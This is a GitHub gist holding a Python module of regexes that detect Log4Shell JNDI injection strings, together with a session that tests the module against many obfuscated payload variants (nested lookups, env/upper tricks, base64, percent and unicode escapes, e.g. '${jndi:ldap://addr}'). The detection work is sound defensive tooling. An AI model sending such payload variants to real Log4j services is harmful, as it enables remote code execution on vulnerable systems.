Skip to content

Instantly share code, notes, and snippets.

@EspressoCake
Forked from karanlyons/log4shell_regexes.py
Created December 14, 2021 02:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save EspressoCake/97164ec3eceb7e5af323d402cf61c97d to your computer and use it in GitHub Desktop.
Save EspressoCake/97164ec3eceb7e5af323d402cf61c97d to your computer and use it in GitHub Desktop.
log4shell Regexes
import re
from urllib.parse import unquote
FLAGS = re.IGNORECASE | re.DOTALL
ESC_DOLLAR = r'(?:\$|\\u0024||\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|\\u007B|\\x7B|\\173|%7B)'
ESC_RCURLY = r'(?:\}|\\u007D|\\x7D|\\175|%7D)'
_BACKSLASH_ESCAPE_RE = re.compile(r'\\(?:u[0-9af]{4}|x[0-9af]{2}|[0-7]{,3})')
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9af]{2}')
# Simple exploitation
SIMPLE_RE = re.compile(
r'\$\{\s*jndi\s*:.*\}',
flags=FLAGS,
)
# Simple exploitation involving escaped content (e.g., \u006a, \156, \x64, %69)
SIMPLE_WITH_ESCAPED_CONTENT_RE = re.compile(
r'\$\{.*(?:\\|%).*\}',
flags=FLAGS,
)
# Nested templating
NESTED_RE = re.compile(
r'\$\{.*\$\{.*\}.*\}',
flags=FLAGS,
)
# Nested templating, including escaped characters
NESTED_INCLUDING_ESCAPES_RE = re.compile(
r'(?:' + ESC_DOLLAR + ESC_LCURLY + r'.*){2}' + ESC_RCURLY + r'.*' + ESC_RCURLY,
flags=FLAGS,
)
# Any ${} tokens
ANY_RE = re.compile(
r'\$\{.*\}',
flags=FLAGS,
)
# Any ${} tokens, including escaped characters
ANY_INCLUDING_ESCAPES_RE = re.compile(
ESC_DOLLAR + ESC_LCURLY + r'.*' + ESC_RCURLY,
flags=FLAGS,
)
# Any of the above, but with an unterminated token (`${jndi:addr`)
for k, r in [(k, r) for k, r in locals().items() if k.endswith('_RE')]:
locals()[k.replace('_RE', '_OPT_RCURLY_RE')] = re.compile(
r.pattern+ r'?',
flags=FLAGS
)
regexes = {k: h for k, h in locals().items() if k[0] != '_' and k.endswith('_RE')}
def test(string):
'''Scan string with all regexes.'''
matches = {}
for name, regex in regexes.items():
if match := regex.search(string):
matches[name] = match
return matches
def test_thorough(string):
'''Scan string with all regexes, recursively decoding escape codes.'''
last_string, matches = None, {}
while (
last_string != string
and (
last_string is None
or len(last_string) > len(string)
)
):
if match := test(string): matches[string] = match
last_string = string
if _BACKSLASH_ESCAPE_RE.search(string):
string = string.encode().decode('unicode_escape')
if _PERCENT_ESCAPE_RE.search(string):
string = unquote(string)
return matches
__all__ = list(regexes.keys()) + ['test', 'test_thorough']
>>> from log4shell_regexes import *

>>> t = lambda s: [k for k in test(s)]
>>> tt = lambda s: [(k, list(v.keys())) for k, v in test_thorough(s).items()]

>>> t('${ jndi\t: addr\n}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${ jndi\t: addr\n')
['SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}')
['SIMPLE_WITH_ESCAPED_CONTENT_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}')
['ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D')
['NESTED_INCLUDING_ESCAPES_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('$%7B\u006a\\156di:addr\\x7d')
['ANY_INCLUDING_ESCAPES_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${jndi:dns://addr}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://addr')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${${::-j}nd${upper:ı}:rm${upper:ı}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[]

>>> tt('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[
	(
		'\\u002524%7Bjnd%24%7Bupper%5Cu003a%5C%5C461%7D%3Aldap%3A\\0452F%2Faddr%7D',
		['NESTED_INCLUDING_ESCAPES_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	), (
		'${jnd${upper\\u003a\\\\461}:ldap://addr}',
		['SIMPLE_WITH_ESCAPED_CONTENT_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	), (
		'${jnd${upper:\\461}:ldap://addr}',
		['SIMPLE_WITH_ESCAPED_CONTENT_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	), (
		'${jnd${upper:ı}:ldap://addr}',
		['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	)
]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment